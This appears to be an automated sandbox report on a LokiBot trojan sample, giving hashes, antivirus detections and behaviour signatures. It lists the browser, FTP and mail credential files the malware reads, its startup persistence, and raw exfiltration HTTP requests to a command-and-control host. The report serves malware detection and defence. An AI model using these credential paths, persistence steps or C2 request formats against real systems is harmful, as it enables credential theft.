* ID: 889 * MalFamily: "Lokibot" * MalScore: 10.0 * File Name: "Loki_a3b2bcb88650a5852ca8a0485391ce42.1" * File Size: 925696 * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows" * SHA256: "af04fe80f80a0b0495958377aa099019d46890dd5fc79a5ea33c87ece98e90cd" * MD5: "a3b2bcb88650a5852ca8a0485391ce42" * SHA1: "305af5c09f5a3add010e1ee82250d24d310d630c" * SHA512: "d6222fa1bb03acd96c2e1cc2b7c6e2ef7749bcdd43ff038e7b429c42a14010adc1a25f78ef643e8e3aa942d9bfe5b318770ab76c756a52ef997a8127c7d88598" * CRC32: "CDF8A7A3" * SSDEEP: "1536:xOXjYijDzy0bBZI3uMaDvBj5QIZv/uyrszBBYb4VCCVVUjMQvEq2cAGMOyn6gCDp:I3og55QKv9b4PoLvh2cQ27eruRYK" * Process Execution: "yldUw7aY96.exe", "wscript.exe", "filename.exe", "filename.exe", "explorer.exe", "services.exe", "lsass.exe", "WmiApSrv.exe", "svchost.exe", "svchost.exe", "taskhost.exe", "WmiPrvSE.exe" * Executed Commands: "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"", "C:\\Users\\user\\subfolder\\filename.vbs ", "\"C:\\Users\\user\\subfolder\\filename.exe\"", "C:\\Users\\user\\subfolder\\filename.exe ", "C:\\Windows\\system32\\lsass.exe", "C:\\Windows\\system32\\wbem\\WmiApSrv.exe", "C:\\Windows\\system32\\svchost.exe -k netsvcs" * Signatures Detected: "Description": "Behavioural detection: Executable code extraction", "Details": "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)", "Details": "Description": "Possible date expiration check, exits too soon after checking local time", "Details": "process": "yldUw7aY96.exe, PID 3068" "Description": "Guard pages use detected - possible anti-debugging.", "Details": "Description": "Detected script timer window indicative of sleep style evasion", "Details": "Window": "WSH-Timer" "Description": "A process attempted to delay the analysis task.", "Details": "Process": "filename.exe tried to sleep 1744 seconds, actually delayed analysis time by 0 seconds" "Description": "Reads data out of its own binary image", "Details": "self_read": "process: yldUw7aY96.exe, pid: 3068, offset: 0x00000000, length: 0x000e2000" "self_read": "process: wscript.exe, pid: 2364, offset: 0x00000000, length: 0x00000040" "self_read": "process: wscript.exe, pid: 2364, offset: 0x000000f0, length: 0x00000018" "self_read": "process: wscript.exe, pid: 2364, offset: 0x000001e8, length: 0x00000078" "self_read": "process: wscript.exe, pid: 2364, offset: 0x00018000, length: 0x00000020" "self_read": "process: wscript.exe, pid: 2364, offset: 0x00018058, length: 0x00000018" "self_read": "process: wscript.exe, pid: 2364, offset: 0x000181a8, length: 0x00000018" "self_read": "process: wscript.exe, pid: 2364, offset: 0x00018470, length: 0x00000010" "self_read": "process: wscript.exe, pid: 2364, offset: 0x00018640, length: 0x00000012" "Description": "A process created a hidden window", "Details": "Process": "yldUw7aY96.exe -> C:\\Users\\user\\subfolder\\filename.vbs" "Process": "yldUw7aY96.exe -> C:\\Users\\user\\subfolder\\filename.exe" "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic", "Details": "post_no_referer": "HTTP traffic contains a POST request with no referer header" "http_version_old": "HTTP traffic uses version 1.0" "suspicious_request_iocs": "http://jiraiya.info/joe23/five/fre.php" "Description": "Performs some HTTP requests", "Details": "url_iocs": "http://jiraiya.info/joe23/five/fre.php" "Description": "A scripting utility was executed", "Details": "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\subfolder\\filename.vbs\"" "Description": "Sniffs keystrokes", "Details": "SetWindowsHookExW": "Process: explorer.exe(1960)" "Description": "Behavioural detection: Injection (Process Hollowing)", "Details": "Injection": "filename.exe(2208) -> filename.exe(2940)" "Description": "Executed a process and injected code into it, probably while unpacking", "Details": "Injection": "filename.exe(2208) -> filename.exe(2940)" "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time", "Details": "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 2250180 times" "Description": "Steals private information from local Internet browsers", "Details": "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" "Description": "Installs itself for autorun at Windows startup", "Details": "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name" "data": "C:\\Users\\user\\subfolder\\filename.vbs -cz" "Description": "Stack pivoting was detected when using a critical API", "Details": "process": "svchost.exe:896" "Description": "Creates a hidden or system file", "Details": "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe" "file": "C:\\Users\\user\\AppData\\Roaming\\474604" "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious", "Details": "Malwarebytes": "Trojan.MalPack.VB.Generic" "Invincea": "heuristic" "F-Prot": "W32/VBKrypt.ZA.gen!Eldorado" "Symantec": "ML.Attribute.HighConfidence" "APEX": "Malicious" "Paloalto": "generic.ml" "Sophos": "Mal/FareitVB-N" "FireEye": "Generic.mg.a3b2bcb88650a585" "SentinelOne": "DFI - Suspicious PE" "Cyren": "W32/VBKrypt.ZA.gen!Eldorado" "Microsoft": "Trojan:Win32/Wacatac.B!ml" "Endgame": "malicious (high confidence)" "Acronis": "suspicious" "Cylance": "Unsafe" "ESET-NOD32": "a variant of Win32/Injector.EHNM" "Fortinet": "W32/Injector.EHNM!tr" "CrowdStrike": "win/malicious_confidence_70% (W)" "Description": "Creates a copy of itself", "Details": "copy": "C:\\Users\\user\\subfolder\\filename.exe" "copy": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe" "Description": "Drops a binary and executes it", "Details": "binary": "C:\\Users\\user\\subfolder\\filename.exe" "Description": "Harvests credentials from local FTP client softwares", "Details": "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml" "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml" "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db" "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml" "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml" "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat" "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts" "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts" "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander" "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager" "Description": "Harvests information related to installed instant messenger clients", "Details": "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml" "Description": "Harvests information related to installed mail clients", "Details": "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1" "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email" "Description": "Collects information to fingerprint the system", "Details": "Description": "Created network traffic indicative of malicious activity", "Details": "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)" "signature": "ET TROJAN LokiBot Fake 404 Response" "signature": "ET TROJAN LokiBot Checkin" "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2" "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1" "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1" "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2" * Started Service: "VaultSvc", "wmiApSrv" * Mutexes: "Local\\ZoneAttributeCacheCounterMutex", "Local\\ZonesCacheCounterMutex", "Local\\ZonesLockedCacheCounterMutex", "6EFA73A4746045B65DEE781E", "Global\\RefreshRA_Mutex_Lib", "Global\\RefreshRA_Mutex", "Global\\RefreshRA_Mutex_Flag", "Global\\WmiApSrv" * Modified Files: "C:\\Users\\user\\subfolder\\filename.exe", "C:\\Users\\user\\subfolder\\filename.vbs", "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck", "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe", "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8", "\\??\\WMIDataDevice", "\\??\\PIPE\\samr", "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST", "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP", "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP", "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP", "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA", "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR", "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER", "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM" * Deleted Files: "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck", "C:\\Users\\user\\subfolder\\filename.exe" * Modified Registry Keys: "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Registry Key Name", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege", "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart", "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider" * Deleted Registry Keys: "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" * DNS Communications: "type": "A", "request": "jiraiya.info", "answers": "data": "47.88.102.244", "type": "A" * Domains: "ip": "47.88.102.244", "domain": "jiraiya.info" * Network Communication - ICMP: * Network Communication - HTTP: "count": 2, "body": "", "uri": "http://jiraiya.info/joe23/five/fre.php", "user-agent": "Mozilla/4.08 (Charon; Inferno)", "method": "POST", "host": "jiraiya.info", "version": "1.0", "path": "/joe23/five/fre.php", "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 176\r\nConnection: close\r\n\r\n", "port": 80 "count": 30, "body": "", "uri": "http://jiraiya.info/joe23/five/fre.php", "user-agent": "Mozilla/4.08 (Charon; Inferno)", "method": "POST", "host": "jiraiya.info", "version": "1.0", "path": "/joe23/five/fre.php", "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n", "port": 80 "count": 2, "body": "\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00", "uri": "http://jiraiya.info/joe23/five/fre.php", "user-agent": "Mozilla/4.08 (Charon; Inferno)", "method": "POST", "host": "jiraiya.info", "version": "1.0", "path": "/joe23/five/fre.php", "data": "POST /joe23/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: jiraiya.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: C43E704C\r\nContent-Length: 149\r\nConnection: close\r\n\r\n\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00", "port": 80 * Network Communication - SMTP: * Network Communication - Hosts: "country_name": "United States", "ip": "47.88.102.244", "inaddrarpa": "", "hostname": "jiraiya.info" * Network Communication - IRC: